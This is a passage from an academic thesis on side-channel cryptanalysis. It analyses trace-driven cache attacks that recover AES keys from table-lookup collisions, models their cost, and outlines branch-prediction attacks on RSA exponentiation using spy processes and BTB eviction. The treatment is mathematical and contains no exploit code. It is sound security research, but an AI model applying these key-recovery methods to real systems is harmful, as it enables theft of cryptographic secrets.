32-bit architectures (c.f. Section 2.2.1). It employs 4 different lookup tables in
the first 9 rounds and a different one in the last round. In this implementation,
all of the component functions, except AddRoundKey, are combined into four
different tables and the rounds turn to be composed of table lookups and bitwise
exclusive-or operations.
In each round, except the last one, it makes 4 references to each of the first
4 tables. The S-box lookups in the final round are implemented as table lookups
to another 1KB-large table , called T4, with 256 many 32-bit elements. There are
16 accesses to T4 in that round. The indices of these accesses are Si10 , where Sit
is the byte i of intermediate state value that becomes the input of round t and
i ∈ {0, .., 15}. Let C be the ciphertext, i.e. the output of the last round, and
represented as an array of 16 bytes, C = (c0 , c1 , ..., c15 ). Individual bytes of C
are computed as:
ci = Sbox[Sw10 ] ⊕ RKi10 ,
where RKi10 is the ith byte of the last round key and Sbox[Sw10 ] is the S-box output
for the input Sw10 for a known w ∈ {0, 1, ..., 15}. The S-box in AES implements a
permutation, and therefore its inverse, i.e. Sbox−1 , exists.
6.2.1. Overview of an Ideal Two-Round Attack
The access indices in the first round are in the form Pi ⊕ Ki , where Pi
and Ki are the ith bytes of the plaintext and the cipherkey respectively and i ∈
{0, 1, ..., 15}. The indices of the first 4 references to the first table, T0, are:
P0 ⊕ K0 , P4 ⊕ K4 , P8 ⊕ K8 , P12 ⊕ K12 .
97
The outcome of the second access to T0, i.e. the one with the index P4 ⊕ K4 , gives
information about K0 and K4 . For example, if the second access results a cache
hit, we can directly conclude that the index P4 ⊕ K4 has to be equal to the index
of the first access, i.e., P0 ⊕ K0 . If it is a cache miss, then the inequality of these
values becomes true. We can use this fact to find the correct key byte difference
K0 ⊕ K 4 .
P 0 ⊕ K0 = P 4 ⊕ K4
=>
K0 ⊕ K4 = P0 ⊕ P4
P0 ⊕ K0 6= P4 ⊕ K4
=>
K0 ⊕ K4 6= P0 ⊕ P4
In other words, if we capture a cache trace during the first round of AES
and the second access to T0 results in a cache hit, then we can directly conclude
that K0 ⊕ K4 = P0 ⊕ P4 . Recall that the plaintext is assumed to be known to
an attacker and the cache is clean prior to the first table lookup so that the first
access to a table always results in a cache miss.
On the other hand, if we see a miss, then K0 ⊕ K4 cannot be equal to
P0 ⊕ P4 and we can eliminate this wrong value. If we collect a sample of traces,
we can find the correct value of K0 ⊕ K4 by either eliminating all possible wrong
values or directly finding the correct value when we realize a cache hit in the
second access in any of the sampled traces.
We can also find the other key byte differences Ki ⊕ Kj , where i,j ∈
{0,4,8,12}, using the same idea. We can further reduce the search space by considering the accesses to other three tables. In general, we can obtain Ki ⊕ K4∗j+i ,
where i,j ∈ {0,1,2,3}, and it is enough to find the entire 128-bit key by searching
only 32 bits.
A final search space of 32 bits is only a theoretical lower bound in the first
round attack due to the complications explained in Subsection 6.2.3. We also have
98
to consider second round accesses to really reduce the search space to 32 bits. The
first round attack only reveals some of the bits of Ki ⊕ Kj . However, when we
examine the collisions between the first and second round accesses in the same
way, i.e., in a “two-round attack”, we can reveal the entire AES key.
6.2.2. Overview of an Ideal Last Round Attack
Another way to find the cipherkey is to exploit the collisions between the
last round accesses. The outcomes of the last round accesses to T4 leaks information about the values of the last round key bytes, i.e., RKi10 where i ∈ {0, .., 15}.
The S-box lookups in the final round are implemented as table lookups
to another 1KB-large table , called T4, with 256 many 32-bit elements. Four
repetations of the same 8-bit long Sbox element are concatenated to each other
to form the corresponding 32-bit long element of T4. There are 16 accesses to T4
in that round. The indices of these accesses are Sw10 , where Swt is the byte w of
the intermediate state value that becomes the input of round t and w ∈ {0, .., 15}.
Let C be the ciphertext, i.e. the output of the last round, and represented as an
array of 16 bytes, C = (c0 , c1 , ..., c15 ). Individual bytes of C are computed as:
ci = Sbox[Ii ] ⊕ RKi10 ,
where RKi10 is the ith byte of the last round key, Sbox[Ii ] is the S-box output for
the input index Ii , and Ii = Sw10 for known w, i ∈ {0, 1, ..., 15}.
Ii is equal to Sw10 for known values of i and w, but the actual mapping
between these variables is not relevant for our purposes. In this paper, we present
our attack under the assumption that the AES memory accesses in the last round
are issued by the processor in a given order, i.e., first T4[I0 ], second T4[I1 ], etc.
However, the actual order is implementation specific and may differ from our
99
assumption. Our attack can easily be adapted to any given order without any
performance loss. We also need to mention that the S-box in AES implements a
permutation, and therefore its inverse, i.e. Sbox−1 , exists.
The outcomes of the last round accesses to T4 leak information about the
values of the last round key bytes, i.e., RKi10 where i ∈ {0, .., 15}. For example, if
the second access to T4 results in a cache hit, we can conclude that the indices I0
and I1 are equal. If it is a cache miss, then the inequality of these values becomes
true. We can use this fact to find the correct round key bytes RK010 and RK110 as
the following.
We can write the value of Ii in terms of RKi10 and ci :
Ii = Sbox−1 [ci ⊕ RKi10 ] ,
If I0 and I1 are equal, so are Sbox−1 [c0 ⊕ RK010 ] and Sbox−1 [c1 ⊕ RK110 ], which
also mandates the equality of c0 ⊕ RK010 and c1 ⊕ RK110 . This equality can also
be written as
c0 ⊕ RK010 = c1 ⊕ RK110 ⇒ c0 ⊕ c1 = RK010 ⊕ RK110
Since the value of C is known to the attacker, RK010 ⊕RK110 can directly be
computed from the values of c0 and c1 if the second access to T4 results in a cache
hit. In case of a cache miss, we can replace the = sign in the above equations
with 6= and we can use the inequalities to eliminate the values that cannot be the
correct value of RK010 ⊕ RK110 .
The value of RK210 relative to RK010 can also be determined by analyzing
the first three accesses to T4 after the correct value of RK010 ⊕ RK110 is found.
Similarly, if we extend our focus to the first four accesses, we can find RK310 . Then
we can find RK410 and so on.
100
In general, we can find all of the round key byte differences RKi10 ⊕ RKj10 ,
where i, j ∈ {0, 1, ..., 15}. The value of any single byte RKi10 can be searched
exhaustively to determine the entire round key. After revealing the entire round
key, it becomes trivial to compute the actual secret key, because the key expansion
of the AES cipher is a reversible function.
6.2.3. Complications in Reality and Actual Attack Scenarios
In a real environment, even if the index of the second access to a certain
lookup table is different than the index of the first access, a cache hit may still
occur. Any cache miss results in the transfer of an entire cache line, not only
one element, from the main memory. Therefore, if the former access retrieves an
element, which lies in the same cache line of the previously accessed data, a cache
hit will occur.
Let δ be the number of bytes in a cache line and assume that each element
of the table is k bytes long. Under this situation, there are δ/k elements in each
line, which means any access to a specific element will map to the same line with
(δ/k − 1) different other accesses. If two different accesses to the same array read
the same cache line, the most significant parts of their indices, i.e., all of the bits
except the last ` = log2 (δ/k) bits, must be identical. Using this fact, we can find
the difference of the most significant part of the key bytes using the equation:
hP0 i ⊕ hP4 i = hK0 i ⊕ hK4 i ,
where hAi stands for the most significant part of A.
Therefore, we can only reveal hKi ⊕K4∗j+i i, where i,j ∈ {0,1,2,3}, using the
collisions in the first round. Notice that (8 − `) is the size of the most significant
101
part of a table entry in terms of the number of bits, where ` = log2 (δ/k). First
round attack allows us to reduce the search space by 12 ∗ (8 − `) bits. In theory
` can be as low as zero bits, in which case the search space becomes only 32 bits.
The most common values of δ are 32 and 64 in widely used processors. For δ = 64
the search space is reduced by 48 bits yielding an 80 bit final search space. This is
the reason why we need to consider the second round indices along with the first
round to achieve full key disclosure.
This complication does affect the last round attack too. We observe a
cache hit in the second access to T4 whenever
hS010 i = hS510 i ,
and so
hSbox−1 [c0 ⊕ RK010 ]i = hSbox−1 [c1 ⊕ RK110 ]i .
However due to the nonlinearity of the AES S-box, only the correct RK010 and
RK110 values obey the above equation for every ciphertext sample. Therefore, we
need to find the correct RK010 and RK110 values instead of their difference. This
increases the search space of this initial guessing problem from 8 bits to 16 bits.
However, once we find these round key bytes, we only need to search through 8
bits to find each of the remaining round key bytes.
6.2.4. Further Details of Our Attacks
In this subsection we explain some details of our attacks that are not
mentioned above. To be more precise, we explain the overall attack strategy and
how to exploit second round accesses.
We call all possible values that can be the correct value of a key byte (round
key byte, respectively) as the hypothesis of that particular key byte (round key
102
byte, resp.) or shortly key byte hypothesis (round key byte hypothesis, resp.).
Incorrect values are called wrong hypothesis. Initially all of the 256 values, i.e.
from 0x00 to 0xff, are considered as the key byte hypothesis for a particular key
byte. During the course of the attack, we distinguish some of these values as
wrong key byte hypothesis; thus decrease the number of hypothesis and increase
that of wrong hypothesis.
In our attacks, we consider each access to a lookup table separately, starting
from the second one. The first access is always a miss because of the cache cleaning
and the assumptions explained above. We want to use the last round attack as
an example to explain the overall attack strategy.
Outcome of the second access to T4 allows us to eliminate the wrong key
hypothesis for RK0 and RK1 . After we find the correct values for these bytes, we
extend our attack considering the third access to find RK2 , then fourth access to
find RK3 and so on. Therefore, there are different steps in the attack and each
further step considers one more access than the number of accesses considered
in the previous step. Each step has a different set of wrong key hypothesis. It
decreases the overall attack cost if we eliminate as many wrong key hypothesis in
a step as possible before proceeding with the next attack step.
For example, the first step of the last round attack examines the outcomes
of the first two accesses to T4 in each captured trace in the sample and eliminates
all of the possible RK0 and RK1 values that are determined to be wrong. The
second step considers the third access to T4 and the remaining hypothesis of RK0
and RK1 and eliminates all of the (RK0 , RK1 , RK2 ) triples that cannot generate
the captured traces. The attack continues with the later steps and only those key
hypothesis that can generate the captured traces remain at the end. If we can
capture a large enough sample then we end up with only the correct key. If we
103
have less number of traces, then more than one hypothesis remain at the end of
the attack and we need to have an exhaustive search on this reduced key set.
Eliminating as many wrong key hypothesis as possible in earlier steps reduces the cost of the later ones and therefore the total cost of this attack. We
eliminate all of the key hypothesis that do not obey the captured trace in each
step. In this sense, our decision strategy is optimal, because it eliminates maximum possible number of hypothesis.
The two round attack is slightly different than this scheme. There are four
different lookup tables used in the first two rounds of AES. Therefore a single step
of the two-round attack considers four more accesses than the previous step, i.e.,
the next unexamined access to each of the four tables. For example, the first step
considers the first 8 accesses in the first round. These 8 accesses consist of two
accesses to each of the four tables. The next step considers the first 12 accesses
and so on.
We also want to give more details of the two-round attack, especially the
second round attack, in this subsection. Using the guesses from the first round, a
similar guessing procedure can be derived in the second round in order to obtain
further key bits. We describe a possible attack that uses only accesses to T1, i.e.,
the second table. Recall that AES implementation we work on uses 5 different
tables with 256 entries in each.
Let ∆i represent Pi ⊕ Ki . The index of the first access to T1 in the second
round is:
Sbox(∆4 ) ⊕ 2 • Sbox(∆9 ) ⊕ 3 • Sbox(∆14 ) ⊕ Sbox(∆3 ) ⊕ Sbox(K14 ) ⊕ K1 ⊕ K5 .
Here Sbox(x) stands for the result of AES S-box lookup with the input value x
and • is the finite field multiplication used in AES.
104
Using only the first 5 accesses to T1, i.e., up to fourth step of the two-round
attack, and searching through K3 , K4 , K9 , and K14 , we can recover these four
bytes. This guessing problem has a key space of 232 . Notice that we can already
recover hK1 ⊕ K5 i in the first round attack.
The indices of the first accesses to each of the lookup tables in the second
round are functions of different key bytes and these functions span each of the 16
key bytes. Hence, we can recover the entire key by analyzing only the outcomes
of the first 5 accesses to each of the four tables, i.e., a total of 20 accesses.
Although knowing only the outcomes of the first 5 accesses is sufficient
to recover the key, extending the attack by taking advantage of further accesses
reduces the number of required traces. We want to mention that only the accesses
of the first two rounds can be used in such a known-plaintext attack. The reason
is the full avalanche effect. Starting from the third round, the indices become
functions of the entire key, making an exhaustive search as efficient as our attack.
6.3. Analysis of the Attacks
In this section we estimate the number of traces need to be capture to
recover the secret key. In other words, we determine the cost of the attacks
presented above.
In the following subsections, we first present a computational model that
allows us to determine the cost of trace-driven attacks and then we use this model
to perform the cost analysis of the proposed attacks. The accuracy of our model
has been verified experimentally.
105
6.3.1. Our Model
Let m be 2(8−`) , i.e. the number of blocks in a table. A block of elements
of a lookup table that are stored together in a single cache line is defined as a
block of this table. The cost of a trace-driven attack is a function of m. The two
most common values of m are 16 and 32 today and thus we evaluate the cost of
the attacks for these two values of m.
In order to calculate the expected number of traces, first we need to find
an equation that gives us the expected number of table blocks that are loaded
into the cache after the first k accesses. We denote this expected number as #k .
The probability of being a single table block not loaded into the cache after
)k . The expected number of blocks that are not
k accesses to this table is ( m−1
m
loaded becomes m ∗ ( m−1
)k . Therefore,
m
#k = m − m ∗ (
m−1 k
) .
m
k
Let Rexpected
be the expected fraction of the wrong key hypothesis that
obeys the captured trace in k th step of the attack. In other words, a wrong key
hypothesis that generated the same trace with the correct key in the first k accesses
of an encryption has a chance of generating the captured outcome in the next step
k
with a probability of Rexpected
. Therefore, if the adversary captures the outcomes
of the first (k + 1) accesses (1 ≤ k ≤ 15) to T4 during a single encryption, he can
k
eliminate (1 − Rexpected
) fraction of the wrong key hypothesis in the k th step of the
attack, where
k
Rexpected
=
#k
#k
#k #k
∗
+ (1 −
) ∗ (1 −
) , 1 ≤ k ≤ 15 .
m
m
m
m
k
Notice that Rexpected
is not the k th power of a constant Rexpected here, but it is
defined as a variable that is specified by the parameter k. The left (right) side of
106
the above summation is the product of the probability of a cache hit (miss, resp.)
and the expected ratio of the wrong hypothesis that remains after eliminating the
ones that does not cause a hit (miss, resp.).
k
The following figure shows the approximations of Rexpected
and #k for dif-
ferent values of k and m. We want to mention again that these values are experimentally verified. The differences between the calculated and empirical values
k
are less than 0.2% in average. We can use these values to find the
of Rexpected
expected number of remaining wrong key hypothesis after t measurements or the
expected number of measurements to reduce the key space down to a specific
number or in any such calculations.
6.3.2. Trade-off Between Online and Offline Cost
There is an obvious trade-off between online and offline cost of the attacks.
If an adversary can capture a higher number of traces, it becomes easier to find
the key. Eliminating more wrong hypothesis in early steps reduces the cost of
the later steps. The change in the offline cost of the attacks with the number of
captured traces can be seen in the following figures.
As shown in Figure 4, the last round attack requires only 5 measurements
to reduce the computational effort of breaking the entire 128-bit key below the
recommended minimum security levels (c.f. [30]). NSA and NIST recommends a
minimum key length of 80 bits for symmetric ciphers so that the computational
effort of an exhaustive search should not be lower than 280 .
107
k
m=32
Rexpected
m=16
#k
Rexpected
#k
1 0.939453 1.000000 0.882813 1.000000
2 0.884523 1.968750 0.787140 1.937500
3 0.834806 2.907227 0.709919 2.816406
4 0.789923 3.816376 0.648487 3.640381
5 0.749522 4.697114 0.600528 4.412857
6 0.713273 5.550329 0.564035 5.137053
7 0.680868 6.376881 0.537265 5.815988
8 0.652021 7.177604 0.518709 6.452488
9 0.626464 7.953304 0.507063 7.049208
10 0.603946 8.704763 0.501197 7.608632
11 0.584236 9.432739 0.500138 8.133093
12 0.567116 10.137966 0.503050 8.624775
13 0.552384 10.821155 0.509209 9.085726
14 0.539850 11.482994 0.517999 9.517868
15 0.529340 12.124150 0.528890 9.923002
FIGURE 6.1. The calculated values of #k and Rexpected for different values of m.
108
m=16
m=32
Number of traces Cost ≈ Number of traces Cost ≈
15
248.43
30
236.83
20
239.09
35
235.27
25
234.74
40
234.61
30
233.68
45
234.36
35
233.53
50
234.28
≥40
< 233.50
≥55
< 234.26
FIGURE 6.2. The cost analysis results of the two-round attack.
m=16
m=32
Number of traces Cost ≈ Number of traces Cost ≈
1
2117.68
1
2120.93
5
274.51
5
290.76
10
235.12
10
256.16
20
224.22
20
233.97
30
221.36
30
227.77
40
220.08
40
224.88
50
219.46
50
223.25
75
219.13
75
221.22
100
219.12
100
220.39
FIGURE 6.3. The cost analysis results of the last round attack.
109
6.4. Experimental Details
We performed experiments to test the validity of the values we have presented above. The results show a very close correlation between our models and
empirical results that confirms the validness of the models and calculations.
Bertoni et al. showed that the cache traces could be captured by measuring
power consumption [15]. In our experimental setup, we did not measure the power
consumption, instead we assumed the correctness of their argument.
We simply modified the AES source code of OpenSSL [71], which is arguably the most widely used open source cryptographic library. The purpose of
our modifications was not to alter the execution flow of the cipher, but to store
the values of the access indices. These index values were then used to generate
the cache traces. This process allowes us to capture the traces and obtain the
empirical results. The average difference between the empirical and calculated
k
values of Rexpected
, i.e, the error rate, is less than 0.2%. We believe this shows
enough accuracy to validate our model.
We generated one million randomly chosen cipherkeys and encrypted 100
random plaintext under each of these keys. In other words, we performed the
last round attack steps with 100 random plaintext. After each encryption, we
determined the ratio of the number of remaining wrong key hypothesis to the
number of wrong key hypothesis that were present before the encryption. We call
k
this ratio the reduction ratio, which is denoted as Rexpected
. We calculated the
average of these measured values. Our results show very close correlation between
k
the measured and calculated values. The calculated Rexpected
values are given in
Subsection 6.3.1.
110
6.5. Conclusion
We have presented trace-driven cache attacks on the most widely used
software implementation of AES cryptosystem. We have also developed a mathematical model, accuracy of which is experimentally verified, to evaluate the cost
of the proposed attacks. We have analyzed the cost using two different metrics,
each of which represents the cost of a different phase of the attack.
Our analysis shows that such trace-driven attacks are very efficient and
require very low number of encryptions to reveal the secret key of the cipher.
To be more specific, an adversary can reduce the strength of 128-bit AES cipher
below the recommended minimum security level by capturing the traces of only 5
encrpytions. Having more traces reduces the total cost of the attack significantly.
Our results also show this trade-off between the online and offline cost of the
attack in detail.
111
7. PREDICTING SECRET KEYS VIA BRANCH PREDICTION
The contradictory requirement of increased clock-speed with decreased
power-consumption for today’s computer architectures makes branch predictors
an inevitable central CPU ingredient, which significantly determines the so called
Performance per Watt measure of a high-end CPU, c.f. [41]. Thus, it is not surprising that there has been a vibrant and very practical research on more and
more sophisticated branch prediction mechanisms, c.f. [78, 91, 92].
Unfortunately, the present document identifies branch prediction even in
the presence of recent security promises for commodity platforms from the Trusted
Computing area as a novel and unforeseen security risk. Indeed, although even
the most recently found security risks for x86-based CPU’s have been implicitly
pointed out in the old but thorough x86-architecture security analysis, c.f. [95],
we have not been able to find any hint in the literature spotting branch prediction as an obvious side channel attack victim. Let us elaborate a little bit on
this connection between side-channel attacks and modern computer-architecture
ingredients.
So far, typical targets of side-channel attacks have been mainly Smart
Cards, c.f. [28, 59]. This is due to the ease of applying such attacks to smart
cards. The measurements of side-channel information on smart cards are almost
“noiseless”, which makes such attacks very practical. On the other side, there are
many factors that affect such measurements on real commodity computer systems
based upon the most successful one, the Intel x86-architecture, c.f. [91]. These
factors create noise, and therefore it is much more difficult to develop and perform
successful attacks on such “real” computers within our daily life. Thus, until very
recently, the vulnerability of systems even running on servers was not “really”
112
considered to be harmful by such side-channel attacks. This was changed with
the work of Brumley and Boneh, c.f. [21] and Chapter3, who demonstrated a
remote timing attack over a real local network. They simply adapted the attack
principle as introduced in [85] to show that the RSA implementation of OpenSSL
[71] — the most widely used open source crypto library — was not immune to
such attacks.
Even more recently, we have seen an increased research effort on the security analysis of the daily life PC platforms from the side-channel point of view.
Here, it has been especially shown that the cache architecture of modern CPU’s
creates a significant security risk, (c.f. [5, 14, 72, 73, 80] and Chapters 4, 5, and
6) which comes in different forms. Although the cache itself has been known for a
long time being a crucial security risk of modern CPU’s, c.f. [95, 48], the above papers were the first proving such vulnerabilities practically and raised large public
interest in such vulnerabilities.
Especially in the light of ongoing Trusted Computing efforts, cf. [99], which
promise to turn the commodity PC platform into a trustworthy platform, cf. also
[25, 35, 42, 79, 99, 103], the formerly described side channel attacks against PC
platforms are of particular interest. This is due to the fact that side channel attacks have been completely ignored by the Trusted Computing community so far.
Even more interesting is the fact that all of the above pure software side channel
attacks also allow a totally unprivileged process to attack other processes running
in parallel on the same processor (or even remote), despite sophisticated partitioning methods such as memory protection, sandboxing or even virtualization.
This particularly means that side channel attacks render all of the sophisticated
protection mechanisms as for e.g. described in [42, 103] as useless. The simple reason for the failure of these trust mechanisms is that the new side-channel attacks
113
simply exploit deeper processor ingredients — i.e., below the trust architecture
boundary, cf. [81, 42].
Having said all this, it is natural to identify other modern computer architecture ingredients, which have not yet been discovered as a security risk and
which are operating below the current trust architecture boundaries. That is the
focus of the present and the next chapters — a processor’s Branch Prediction Unit
(BPU). More precisely, we analyze BPUs and highlight the security vulnerabilities
associated with their opaque operations deep inside a processor. In other words,
we present so called branch prediction attacks on simple RSA implementations as
a case study to describe the basics of the novel attacks an adversary can use to
compromise the security of a platform. Our attacks can also be adapted to other
RSA implementations and/or other public-key systems like ECC. We try to refer
to specific vulnerable implementations throughout this text.
7.1. Outlines of Various Attack Principles
We gradually develop 4 different attack principles in this section. Although
we describe these attacks on a simple RSA implementation, the underlying ideas
can be used to develop similar attacks on different implementations of RSA and/or
on other ciphers based upon ECC. In order to do so, we assume that an adversary
knows every detail of the BPU architecture as well as the implementation details
of the cipher (Kerckhoffs’ Principle). This is indeed a valid assumption as the
BPU details can be extracted using some simple benchmarks like the ones given
in [65].
114
7.1.1. Attack 1 — Exploiting the Predictor Directly (Direct Timing Attack)
In this attack, we rely on the fact that the prediction algorithms are deterministic, i.e., the prediction algorithms are predictable. We present a simple
attack below, which demonstrates the basic idea behind this attack. The presented
attack is a modified version of Dhem et al.’s attack [34]. Assume that the RSA
implementation employs Square-and-Multiply exponentiation and Montgomery
Multiplication. Assume also that an adversary knows the first i bits of d and is
trying to reveal di . For any message m, he can simulate the first i steps of the
operation and obtain the intermediate result that will be the input of the (i + 1)th
squaring. Then, the attacker creates 4 different sets M1 , M2 , M3 , and M4 , where
M1 = {m | m causes a misprediction during MM of (i + 1)th squaring if di = 1}
M2 = {m | m does not cause a misprediction during MM of (i + 1)th squaring if di = 1}
M3 = {m | m causes a misprediction during MM of (i + 1)th squaring if di = 0}
M4 = {m | m does not cause a misprediction during MM of (i + 1)th squaring if di = 0},
and MM means Montgomery Multiplication. If the difference between timing
characteristics, e.g., average execution time, of M1 and M2 is more significant
than that of M3 and M4 , then he guesses that di = 1. Otherwise di is guessed to
be 0. To express the above idea more mathematically, we define:
• An Assumption Ait : di = t , where t ∈ {0, 1}.
• A Predicate P : (m) → {0, 1} with
P(m) =



1 if a misprediction occurs during the computation of m2 (modN )


0 otherwise.
115
• An Oracle Ot : (m, i) → {0, 1} under the assumption Ait :
Ot (m, i) =



1 P(mtemp ) = 1


0 P(mtemp ) = 0,
where mtemp = m(d0 ,d1 ,...di−1 ,t)2 (modN ).
• A Separation Sit under the assumption Ait :
(S0 , S1 ) = ({m|Ot (m, i) = 0}, {m|Ot (m, i) = 1}).
For each bit of d, starting from d1 , the adversary performs two partitionings
based on the assumptions Ai0 and Ai1 , where di is the next unknown bit that he
wants to predict. He partitions the entire sample into two different sets. Each
assumption and each plaintext, M , in one of these sets yields the same result for
Ot (M, i). We call these partitioning separations Si0 and Si1 . Depending on the
actual value of di , one of the assumptions Ai0 and Ai1 will be correct. We define the
separation under the correct assumption as “Correct Separation” and the other
as “Random Separation”. To be more precise, we define the Correct Separation
CSi as
CSi = Sit = (CS0i , CS1i ) = ({M |Ot (M, i) = 0}, {M|Ot (M, i) = 1}),
and the Random Separation RSi as
RSi = Si1−t = (RS0i , RS1i ) = ({M |O1−t (M, i) = 0}, {M|O1−t (M, i) = 1}),
where di = t. The decryption of each plaintext in CS1i encounters a misprediction
delay during the ith squaring, whereas none of the plaintext in CS0i results in a
misprediction during the same computation. Therefore, the adversary will realize
116
a significant timing difference between these two sets and he can predict the value
of di . On the other hand, the occurrences of the mispredictions will be randomlike for the sets RS0i and RS1i , which is the reason why we call it a random
separation. We can define a correct decision as taking that decision di = t, where
Ot (M, i) = P(M(d0 ,d1 ,...di )2 (modN), i) for each possible M .
This attack requires the knowledge of the BPU state just before the decryption, since this state, as well as the execution of the cipher, determines the
prediction of the target branch. This information is not readily available to an
adversary. However, he can perform the analysis phase assuming each possible
state one at a time. One expects that only under the assumption of the correct
state the above separations should yield a significant difference. Yet, a better
approach is to set the BPU state manually. If the adversary has access to the
machine the cipher is running on, he can execute a process to reset the BPU state
or to set it to a desired state. Indeed, this is the strategy we follow in our other
attacks. This type of attacks can be applied on any platform as long as a deterministic branch prediction algorithm is used on it. To break a cipher using this
kind of attack, we need to have a target branch, outcome of which must depend
on the secret/private key of the cipher, a known nonconstant value like the plaintext or the ciphertext, and (possibly) some unknown values that can be searched
exhaustively in a reasonable amount of time.
7.1.1.1. Examples of vulnerable systems.
RSA with MM and without CRT (Chinese Remainder Theorem) are susceptible to this kind of attack. The conditional branch of the extra reduction
step can be used as the target branch. We have already showed the attack on
117
S&M exponentiation. It can be adapted to b-ary and sliding windows exponentiation, c.f. [64] and Section 2.1.2, too. In these cases, the adversary needs to
search each window value exhaustively and construct the partitions for each of
these candidate window values. He encounters the correct separation only for the
correct candidate and therefore can realize the correct value of the windows. If
CRT is employed in the RSA implementation, we cannot apply this attack. The
reason is that the outcome of the target branch will also depend on the values of
p and q, which are not feasible to be searched exhaustively. Similarly, if the RSA
implementation does not have a branch that is taken or not taken depending on
a known nonconstant value (e.g. extra reduction step in Montgomery Multiplication, which is input dependent to be performed), we cannot use this approach to
find the secret key. For example, the if statement in S&M exponentiation (c.f.
Line 4 in Fig. 2.1) as our target branch is not vulnerable to this attack. This is
due to the fact that the mispredictions will occur in exactly the same steps of
the exponentiation regardless of the input values, and one set in each of the two
separations will always be empty.
7.1.2. Attack 2 — Forcing the BPU to the Same Prediction
(Asynchronous Attack)
In this attack, we assume that the cipher runs on a simultaneous multithreading (SMT) machine, c.f. [92], and the adversary can run a dummy process
simultaneously with the cipher process. In such a case, he can clear the BTB
via the operations of the dummy process and causes a BTB miss during the
execution of the target branch. The BPU automatically predicts the branch as
not to be taken if it misses the target address in the BTB. Therefore, there will be
a misprediction whenever the actual outcome of the target branch is ‘taken’. We
118
stress that the two parallel threads are isolated and share only the common BPU
resource, c.f. [92, 91, 73, 80]. Borrowed from [73], we name this kind of attack
an Asynchronous Attack, as the adversary-process needs no synchronization with
the simultaneous crypto process. Here, an adversary also does not need to know
any details of the prediction algorithm. He can simulate the exponentiations as
done in the previous attack and can partition the sample based on the “actual”
outcome of the branch. In other words, the following predicate in the oracle (c.f.
Section 7.1.1) can be used:



1 if the target branch is taken during the computation of m2 (modN )
P(m) =


0 otherwise.
The adversary does not have to clear the entire BTB, but only the BTB set that
stores the target address of the branch under consideration, i.e., the target branch.
We define three different ways to achieve this:
• Total Eviction Method: the adversary clears the entire BTB continuously.
• Partial Eviction Method: the adversary clears only a part of the BTB continuously. The BTB set that stores the target address of the target branch
has to be in this part.
• Single Eviction Method: the adversary continuously clears only the single
BTB set that stores the target address of the target branch.
The easiest method to apply is clearly the first one, because an adversary
does not have to know the specific address of the target branch. Recall that
the set of the BTB to store the target address of a branch is determined by the
actual logical address of that branch. The resolution of clearing the BTB plays a
crucial role in the performance of the attack. We have assumed so far that it was
119
possible to clear the entire BTB between two consecutive squaring operations of
an exponentiation. However, in practice this is not (always) the case. Clearing the
entire BTB may take more time than it takes to perform the operations between
two consecutive squarings. Although, this does not nullify the attack, it will
mandate (most likely) a larger sample size. Therefore, if an adversary can apply
one of the last two eviction methods, he can improve the performance of the attack.
We want to mention that, from the cryptographic point of view, we can assume
that an adversary knows the actual address of any branch in the implementation
due to Kerckhoff’s Principle. Under this assumption, the adversary can apply the
single eviction method and achieve a very low resolution, which enables him to
cause a BTB miss each time the target branch is executed. Recall also that there
is no complicated synchronization between crypto and adversary process needed.
7.1.2.1. Examples of vulnerable systems.
The same systems vulnerable to the first attack (c.f. Section 7.1.1) are also
vulnerable to this kind of attack. The main difference of this attack compared
to the first one is the ease of applying it, i.e., unnecessity of knowing = reverseengineering the subtle BPU details, yielding the correct BPU states for specific
time points.
7.1.3. Attack 3 — Forcing the BPU to the Same Prediction (Synchronous Attack)
In the previous attack, we have specifically excluded the synchronization
issue. However, if the adversary finds a way to establish a synchronization with the
cipher process, i.e., he can determine for (e.g.) the ith step of the exponentiation
120
and can clear the BTB just before the ith step, then he can introduce misprediction
delays at certain points during the computation. Borrowed again from [73], we
named this kind of attack a Synchronous Attack, as the adversary-process needs
some kind of synchronization with the simultaneous crypto process. Assume that
the RSA implementation employs S&M exponentiation and the if statement in
S&M exponentiation (c.f. Line 4 in Figure 2.1) is used as the target branch. As
stated above, the previous attacks cannot break this system if only the mentioned
conditional branch is examined. However, if the adversary can clear the BTB set
of the target branch (c.f. Single Eviction Method in Section 7.1.2) just before the
ith step, he can directly determine the value of di in the following way.
The adversary runs RSA for a known plaintext and measures the execution time. Then he runs it again for the same input but this time he clears the
single BTB set during the decryption just before the ith execution of the conditional branch under examination, i.e., the if statement of Line 4 in Fig. 2.1. This
conditional branch is taken or not taken depending only on the value of di . If it
turns out to be taken, the second decryption will take longer time than the first
execution because of the misprediction delay. Therefore, the adversary can easily
determine the value of this bit by successively analyzing the execution time.
7.1.3.1. Examples of vulnerable systems.
Any implementation of a cryptosystem is vulnerable to this kind of attack
if the execution flow is “key-dependent”. The exponents of RSA with S&M exponentiation can be directly obtained even if the CRT is used. If RSA employs
sliding window exponentiation, then we can find a significant number of bits (but
not all) of the exponents. However, if b-ary method is employed, then only 1 over
121
2wsize of the exponent bits can be discovered, where wsize is the size of the window. This attack can even break such prominent and efficient implementations
that had been considered to be immune to certain kinds of side-channel attacks,
c.f. [52, 105].
7.1.4. Attack 4 — Trace-driven Attack against the BTB (Asynchronous Attack)
In the previous three attacks, we have considered analyzing the execution
time of the cipher. In this attack, we will follow a different approach. Again,
assume that an adversary can run a spy process simultaneously with the cipher.
This spy process continuously executes branches and all of these branches map to
the same BTB set with the conditional branch under attack. In other words, there
is a conditional branch (under attack) in the cipher, which processes the exponent
and executes the corresponding sequence of operations. Moreover, assume also
that the branches in the spy process and the cipher process can only be stored in
the same BTB set. Recall that it is easy to understand the properties of the BTB
using simple benchmarks as explained in [65].
The adversary starts the spy process before the cipher, so when the cipher
starts decryption/signing, the CPU cannot find the target address of the target
branch in BTB and the prediction must be not-taken, c.f. [92]. If the branch
turns out to be taken, then a misprediction will occur and the target address of the
branch needs to be stored in BTB. Then, one of the spy branches has to be evicted
from the BTB so that the new target address can be stored in. When the spyprocess re-executes its branches, it will encounter a misprediction on the branch
that has just been evicted. If the spy-process also measures the execution time
of its branches (altogether), then it can detect whenever the cipher modifies the
122
BTB, meaning that the execution time of these spy branches takes a little longer
than usual. Thus, the adversary can simply determine the complete execution
flow of the cipher process by continuously performing the same operations, i.e.,
just executing spy branches and measuring the execution time. He will see the
prediction/misprediction trace of the target branch, and so he can determine the
execution flow. We named this kind of attack an Asynchronous Attack, as the
adversary-process needs no synchronization at all with the simultaneous crypto
process — it is just following the paradigm: continuously execute spy branches
and measure their execution time.
7.1.4.1. Examples of vulnerable systems.
